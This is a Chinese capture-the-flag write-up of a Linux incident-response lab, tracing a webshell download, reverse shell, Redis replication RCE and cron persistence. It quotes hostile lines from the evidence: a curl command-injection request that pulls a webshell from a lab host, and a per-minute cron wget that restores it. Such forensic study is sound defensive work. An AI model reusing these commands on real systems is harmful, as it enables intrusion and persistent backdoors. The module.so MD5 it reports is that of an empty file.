当前位置：首页 > article >正文

玄机靶场-第九章 blueteam 的小心思 3 WP

article 2026/4/21 1:46:16

玄机靶场-第九章 blueteam 的小心思 3 WP这道题是一个比较经典的 Linux 应急响应场景考察的是 Apache 日志分析、流量包溯源、Redis 主从复制 RCE 以及 Cron 权限维持排查。题目一共 5 个步骤难度中等下面是完整的解题过程和思路复盘。1. 找到恶意木马的下载来源上来先登录靶机账号 root密码 root123看看现场情况。第一步要找的是攻击者下载木马时用的那个外部 IP。直接去翻 Apache 的访问日志路径在/var/log/apache2/里面有几个.gz的压缩包先 gunzip 解压然后 grep 一下带.php的记录。很快就能在日志末尾发现一条很明显的命令执行记录192.168.150.1 - - [21/Dec/2023:07:39:58 0100] GET /secret/evil.php?commandsystem(curl http://192.168.150.253:8080/shell.php -o /var/www/html/secret/.shell.php); HTTP/1.1 200 203这条日志说明攻击者是通过/secret/evil.php里的命令执行漏洞用 curl 从192.168.150.253:8080把木马拉下来的写到了 Web 目录里还改成了隐藏文件.shell.php。Flag 1flag{192.168.150.253}2. 提取 WebShell 的连接密码把根目录下的/result.pcap下载到本地用 Wireshark 打开。已经知道木马文件名是.shell.php直接过滤 HTTP 流量找跟这个文件相关的 POST 请求。追踪 TCP 流之后能看到攻击者跟 WebShell 的交互内容POST Body 里传命令用的参数名就是连接密码。也可以直接在靶机上 cat 一下木马源码密码写在里面一眼就看到了cmd。Flag 2flag{cmd}3. 定位反弹 Shell 的目标地址攻击者连上 WebShell 之后下一步肯定是反弹个稳定的 Shell 出去。继续在 Wireshark 里翻 HTTP 流量把攻击者发的 Payload 一条条解码看。在其中一条请求里发现了反弹 Shell 的指令目标地址写得很清楚IP 是192.168.150.199端口是4444。Flag 3flag{192.168.150.199:4444}4. 找到 Redis 主从复制攻击留下的恶意 .so 文件这一步要找的是攻击者通过 Redis 主从复制 RCE 上传的恶意动态库文件的 MD5。在 Wireshark 里过滤 TCP 流量搜索关键字SLAVEOF能看到完整的 Redis 主从复制攻击过程攻击者先把目标 Redis 设成自己控制的恶意 Redis 的从节点然后通过CONFIG SET dbfilename module.so把恶意.so文件写到磁盘最后MODULE LOAD加载执行。回到靶机在根目录/下确实有一个module.so直接算 MD5md5sum /module.so# d41d8cd98f00b204e9800998ecf8427e /module.soFlag 4flag{d41d8cd98f00b204e9800998ecf8427e}5. 排查权限维持的 Cron 计划任务最后一步找攻击者留下的持久化后门。在流量包里搜crontab或者wget追踪对应的 TCP 流发现攻击者写入了一条计划任务*/1 * * * * /usr/bin/wget http://192.168.150.199:88/shell.php -O /var/www/html/secret/.shell.php每分钟从远端拉一次 WebShell 覆盖本地这样就算管理员删了木马一分钟后又回来了。这个地址就是权限维持用的外部请求地址。Flag 5flag{http://192.168.150.199:88/shell.php}总结整条攻击链路很清晰攻击者利用evil.php命令执行漏洞下载初始 WebShell → 通过 WebShell 连接并反弹 Shell192.168.150.199:4444→ 利用 Redis 主从复制 RCE 上传恶意.so模块实现更深层控制 → 写入 Cron 计划任务每分钟重新拉取 WebShell 维持权限。Flag 汇总木马下载源 IPflag{192.168.150.253}WebShell 连接密码flag{cmd}反弹 Shell 地址flag{192.168.150.199:4444}恶意 .so 文件 MD5flag{d41d8cd98f00b204e9800998ecf8427e}权限维持地址flag{http://192.168.150.199:88/shell.php}

玄机靶场-第九章 blueteam 的小心思 3 WP

相关文章：

玄机靶场-第九章 blueteam 的小心思 3 WP

药物临床试验亚组分析指导原则（试行）

C++ 笔记高级线程同步原语与线程池实现

《检验检测机构资质认定管理办法》解读，检测机构资质认定实操指南与合规要点

终极HLS流媒体下载器：一键保存加密视频的完整指南

SCH16T-K20陀螺仪、加速度计、惯性测量单元IMU、组合惯导系统

大模型应用误区：RAG与垂域模型到底啥关系？老板必看！

雷军15小时一镜到底测SU7续航跑1313公里，撕下了汽车评测行业的遮羞布

9 款免费测试管理系统对比：谁更适合中小企业和研发团队？

从命令行到IDE：OMNeT++ 4.6安装后，如何高效创建你的第一个网络仿真项目？

SAP GUI 760环境下，ABAP Dialog Screen开发的5个新手常见坑及避坑指南

计算机毕业设计：Python棉花种植生产智能监测与预测系统 Django框架 ARIMA算法数据分析可视化爬虫大数据大模型（建议收藏）✅

编写程序搭建社保医保代扣对账校验工具，核对智能代扣流水与缴费标准，自动筛查扣费误差漏扣错扣异常账单。

(claude code)最强skill everything-claude-code 技能完整指南

基于深度学习的YOLO11的河道垃圾识别海洋垃圾检测与垃圾分类项目介绍

敏芮芯途敏宝长高奶粉，助力敏宝长高，超 90%宝妈信赖的选择！

推送通知实现长连接与消息队列

ArcMap转换坐标系

前端三大核心技术语言

AI结对编程实测：减少47%代码评审时间的“黑暗技巧”——测试工程师的效能革命

NCE外汇：指尖战场还是桌面指挥中心？深入对比移动端与桌面版交易体验

3分钟掌握微信聊天记录完整导出：WeChatMsg终极实战指南

第3篇：封装——公有、私有与property

如何修复 Flexbox 布局在移动端失效的问题：关键在于容器宽度与响应式约束

手机设置手动代理后，小程序进不去，提示“运行环境加载失败2101”

别再只用if-else了！用Simulink Stateflow Chart模块给你的算法加个‘状态’（附代码生成分析）

Python基础-[面试]-救急知识速背

AI周报 | 算力涨价近半、融资965亿、AI开始像真人员工

AVIF 与 PNG：下一代图像格式如何改变网页视觉与性能

Session Startup：中描述的md文件是代码读取，还是 AI 操作？